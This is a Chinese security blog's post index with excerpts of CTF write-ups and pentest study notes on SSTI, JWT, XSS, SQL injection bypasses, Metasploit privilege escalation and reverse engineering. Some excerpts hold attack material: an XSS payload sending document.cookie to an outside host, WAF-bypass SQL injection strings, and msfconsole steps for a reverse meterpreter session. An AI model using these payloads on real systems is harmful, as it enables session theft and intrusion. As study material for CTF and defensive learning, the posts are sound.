- 博客(108)
- 收藏
- 关注
RSS订阅原创 ctfshow 其他
web396、397、398、399、400、401 parse_url 绕过源码error_reporting(0);if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']);}else{ highlight_file(__FILE__);}这里没有什么限制直接绕过payload一?url=http
2022-01-11 23:01:14
3197
1
原创 ctfshow_黑盒测试
文章目录WEB38WEB39web40web41WEB38payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagWEB39这里爆出了路径,直接访问获取flag。web40这里和上一题一样,但是多了一个弱密码.web41...
2021-12-22 15:49:21
470
原创 ctfshow ssti
前言开始SSTI,参考文章:参考文章flask之ssti模版注入从零到入门bfengj博客yu22x由于本人太菜了,只能先学其他大佬的博客先做题。__class__ 类的一个内置属性,表示实例对象的类。__base__ 类型对象的直接基类__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases____mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查
2021-10-15 12:09:03
425
2
原创 ctfshow_JWT
文章目录JWT简介WEB345JWT简介Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。JSON Web Token 入门教程JWT简要介绍
2021-10-14 22:05:08
342
原创 ctfshow XSS
收集一下可用的姿势吧,window.open:open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口。location.href=”/url” 当前页面打开URL页面windows.location.href=”/url” 当前页面打开URL页面onfocus 事件在对象获得焦点时发生autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。<script>window.open('http://ip:端口/'+document.cookie)</
2021-10-07 14:32:54
218
原创 ctfshow-phpcve
web312(CVE-2018-19518)-PHP-IMAPphp imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。影响:PHP:5.6.38系统:Debian/ubuntu
2021-10-04 22:53:48
154
原创 ctfshow- java
web279-294 296-297yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71具体用法在md文件中,例如检测python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action利用python Struts2Scan.py -u http://94c4c47
2021-08-25 23:22:55
546
原创 ctfshow_ThinkPHP专题
web569-- 路由打开页面是这样的这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册不想看的,我就简单的截取一张图片来看一下PATHINFO模式下面的URL访问地址是:http://localhost/index.php/home/user/login/var/value/然后根据提示直接构造就是了payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80
2021-07-02 14:08:17
405
3
原创 c语言逆向 指针逆向小案例
1、列出每一行的反汇编代码: char a = 10; mov byte ptr [a],0Ah short b = 20; mov eax,14h mov word ptr [b],ax int c = 30; mov dword ptr [c],1Eh char* pa = &a; lea eax,[a] mov dword ptr [pa],eax
2021-07-01 11:12:05
389
转载 【小迪安全学习笔记】基础入门-系统及数据库等
前言:除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。操作系统层面识别操作系统常见方法通过网站或通过扫描相关软件识别大小写对网页都没有影响,这种情况就可以认定为windows服务器,因为windows服务器不区分大小写这个网站对应的操作系统是linux服务器也可以用TTL来判断服务器系统,相邻的值来判断ip地址可用nmap来判断操作系统 nmap -O IP简要两者区别
2021-06-19 17:47:08
332
原创 【小迪安全学习笔记】基础入门-搭建安全拓展
涉及知识:常见搭建平台脚本启用ASP,PHP,ASPX,JSP,PY,JAVAWEB等环境域名IP目录解析安全问题IP地址访问可以发现更多的信息同时经常能找到程序源码备份文件和敏感信息,而域名访问只能发现一个文件夹下的所有文件。网站搭建的时候支持IP访问和域名访问,域名访问的时候一般只会指向某个目录,IP访问的时候指向的是根目录。常见文件后缀解析对应安全指定后缀名对应某个文件,访问网站出现遇到不能解析的文件就是中间件可能默认或者添加某些设置导致解析时出现问题。常见安全测试中的安全防护学校内
2021-06-19 17:41:35
339
原创 msf windows提权方法总结
简介提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等1.getsystem这里使用getsystem命令试一下,运气好的话可能就提到了system2.bypassuac内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
2021-06-18 20:21:36
2811
2
原创 msf 上线方法
首先选中模块use exploit/multi/script/web_deliveryroot@kali:~# msfconsole msf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_delivery) > set payload windows/x64/meterpreter/revers
2021-06-18 18:24:54
1179
原创 c语言逆向 循环语句反汇编
do while这里do while很简单就没什么好说的了。总结:1、根据条件跳转指令所跳转到的地址,可以得到循环语句块的起始地址。2、根据条件跳转指令所在的地址,可以得到循环语句块的结束地址。while总结:1、根据条件跳转指令所跳转到的地址,可以得到循环语句块的结束地址;2、根据jmp 指令所跳转到的地址,可以得到循环语句块的起始地址;3、在还原while 比较时,条件跳转的逻辑与源码相反。for 语句的语法总结:1、第一个jmp 指令之前为赋初值部分.2、第一个jmp
2021-06-10 18:01:58
354
2
原创 c语言 switch反汇编
switch语句反汇编一、switch语句1、在正向编码时,switch语句可以看做是if语句的简写2、break在switch语句的妙用1、当switch存在3个分支时当去掉break的时候二、switch语句的反汇编1、当switch存在3个分支时#include<stdio.h>void Function(int x) { switch (x) { case 1: printf("1"); case 2: printf("2"); cas
2021-06-09 17:45:45
896
6
原创 python核心编程 第4章 深入类和对象
4-1 鸭子类型和多态性什么是鸭子类型当看到一只鸟走起来像鸭子、游泳起来像鸭子、叫起来也像鸭子, 那么这只鸟就可以被称为鸭子.在下面这段代码中, 所有的类实现了同一个方法, 这些类就可以归为同一种类型, 这样在调用的时候就可以都调用say方法, 从而实现了多态, 一种接口多种实现.class Cat(object): def say(self): print("i am a cat")class Dog(object): def say(self):
2021-06-06 15:57:14
68
原创 python 魔法函数一览
字符串表示__str__如果要把一个类的实例变成 str,就需要实现特殊方法__str__():不使用__str__()方法class Student(object): def __init__(self,id,name,age): self.id=id self.name=name self.age=age s=Student(111,"Bob",18)print(s)输出结果:<main.Student object a
2021-06-06 14:36:37
269
原创 ctfshow 代码审计
web301这里看了一下文件发现,就一些登入页面文件然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计<?phperror_reporting(0);session_start();require 'conn.php';$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空$_POST['userpwd']=!empty(
2021-05-21 11:52:05
707
原创 shellcode 编写原则 一
VS在开发平台汇总,双引号字符串会被编译到只读数据段,已引用绝对地址的使用。而在shellcode编程中,要尽量 避免一切绝对地址的使用。无字节int EntryMain(){ return 0;}有字节int EntryMain(){ char szData[] = "123456"; //char *pszData = "123456"; return 0;}这里我们有字节和无字节生成的程序对比,发现不同的地方在这其他的就一样了,这里因为我们的代码优化原.
2021-05-21 00:45:17
305
1
原创 shellcode 环境搭建
什么是shellcode1、 独立的存在,无需任何文件格式的包装2、内存中运行,无需固定指定的宿主进程shellcode的基本特点1、短小精悍2、灵活多变shellcode 生成方法shellcode 环境配置简单生成一个简单的程序int main(){ return 0;}生成文件这里发现一个简单的程序自动生成了这么多文件,所以我们应该想个办法清除这些文件修改入口点关闭缓冲区安全检查重新生成发现生成的文件变小了很多放进ida里面去分析,然后只有一个sta
2021-05-20 23:04:30
251
原创 [MRCTF2020]Ez_bypass 1
源码include 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got th
2021-05-17 08:16:49
373
原创 [GXYCTF2019]BabyUpload
打开页面发现是个文件上传这里先看看禁用了什么吧,这里先传一个PHPinfo()发现不行,这里发现过滤了<?,这里的PHP版本为:PHP/5.6.23,可以使用绕过也不允许上传ph格式的文件总结一下: 上传检测:Content-Type : image/jpeg, 文件名后缀不能是 ph 开头,文件内容过滤<?这里根据经验爆出是Apache然后我们可以想到.htaccess...
2021-05-15 23:03:05
68
原创 python核心编程-一切皆对象
Python中一切皆对象元类编程猴子补丁动态语言和静态语言的区别python的面向对象更彻底Java中object是class的一个实例Python中class也是对象, 函数也是对象Python中的代码和模块也是对象函数和类也是对象,属于python的一等公民赋值给一个变量可以添加到集合对象中可以作为参数传递给函数可以当做函数的返回值对类进行实例化的时候返回的是一个类的对象def ask(name="boby"): print(name) print
2021-05-15 11:57:59
73
原创 c语言逆向学习笔记 day 二
c语言中的数据类型2、学习数据类型的三个要素:1、存储数据的宽度2、存储数据的格式3、作用范围(作用域)3、整数类型:char short int longchar 8BIT 1字节 short 16BIT 2字节 int 32BIT 4字节long 32BIT 4字节4、浮点类型:float double将一个float型转化为内存存储格式的步骤为:1、先将这个实数的绝对值化为二进制格式2、将这个二进制格式
2021-05-12 22:03:58
150
原创 c语言逆向学习笔记 day 1
c语言 __declspec(naked)裸函数1、什么是裸函数就是编译器不会为这个函数生成代码,想用汇编怎么写就怎么写,如果什么都不写,一定会报错,因为没有生成ret2、裸函数框架一、裸函数模板int _declspec(nacked) Function(int x,int y,int z){ _asm { ret }}二、无参数无返回值框架void __declspec(naked) Function() { _
2021-05-12 00:26:37
209
原创 安全狗- bypass技巧
sql注入bypass判断是否存在注入payload?id=2' and -ascii('a')=-abs('-97') --+hhp参数污染payload?id=1' /*&id=1' order by 99 --+ */报错注入payload?id=1' /*&id=-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.table
2021-05-07 23:17:47
207
原创 Metasploit MSF发现内网存活主机
基于ARP发现内网存活主机ARP简介:ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址使用模块:use post/windows/gather/arp_scannerset SESSION 1set RHOSTS 192.168.1.120-125run 、zf=0js果为负则跳转、SF=1jns结果为非负则跳转、SF=0...
2021-04-18 21:59:41
295
原创 【Win32汇编】jmp,call,ret 指令
JMP指令:修改EIP的值MOV EIP,寄存器/立即数 简写为 JMP 寄存器/立即数这里我们只需要观察eip的值就好了CALL指令:PUSH 地址BMOV EIP,地址A/寄存器简写为:CALL 地址A/寄存器这里做个简单的演示这里需要注意观察esp和eip的值执行一下,可以看到这里esp地址里村的是call下一个的地址。RET指令:LEA ESP,[ESP+4]MOV EIP,[ESP-4]简写为:RET这里还是用刚刚的例子这里可以看到返回
2021-04-18 17:01:25
518
原创 【Win32汇编】MOVS,STOS,REP 指令
ESI/EDI 分别叫做"源/目标索引寄存器"(source/destination index),因为在很多字符串操作指令中, DS:ESI指向源串,而ES:EDI指向目标串.MOVSMOVS 指令用于将一个内存操作数的值“复制”到另一个内存操作数,使用 MOVS 前要把目标内存的地址移入 EDI,源目标内存移入 ESI。(记忆方法:D表示destination,目标;S表示source,源)假设内存 0x0019FF70 的值为2,0x0019FF6C 的值为1,将这两个地址分别存入EDI E.
2021-04-18 16:40:22
3239
原创 ctfshow_图片篇(信息附加)
文章目录misc5misc6misc7misc8misc9misc10misc11misc5editor直接打开misc6misc7editor打开misc8用editor搜索发现有两个png用foremost分离一下得到misc9提示: flag在图片块里。用png模板打开在图片块里找到。misc10提示 flag在图片数据里。用editor打开搜索flag发现没有misc11提示 flag在另一张图里。IDAT定义:图像数据块IDAT(image da
2021-04-13 22:43:16
656
原创 ctfshow-php特性系列
文章目录WEB89-数组绕过WEB90-intval绕过WEB91-preg_match-换行绕过WEB92-科学计数法EWEb93WEB94WEB95WEB96WEB97-MD5绕过WEB98WEB89-数组绕过源码:include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){
2021-04-10 17:57:57
1177
原创 渗透测试练习靶场hackthebox_Oopsie
文章目录扫描路径泄露登录升级shell权限提升后续总结扫描根据给出的IP地址,使用nmap进行扫描nmap -sS -F -sV 10.10.10.28-sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手-F:快速扫描,扫描一些常用端口-sV:探测开启的端口来获取服务、版本信息如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查路径泄露方法一这里他说要登入,但是我们这里不知道登入口在哪发现可以登录,但是目前没有
2021-03-31 23:27:40
1984
原创 hackthebox_Archetype
文章目录信息收集扫描信息收集扫描根据网站的提示,我们连上vpn的目标机的ip是10.10.10.27nmap -sC -sV 10.10.10.27-sC:使用默认脚本进行扫描,等同于–script=default-sV:探测开启的端口来获取服务、版本信息可以发现,目标开启了135、139、445、1433端口,其中1433是SQL Server数据库默认使用的端口,445是文件共享协议(SMB)默认使用的端口测试445端口测试445端口的SMB服务是否支持匿名访问,没有经过权限配
2021-03-28 13:42:20
1164
7
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人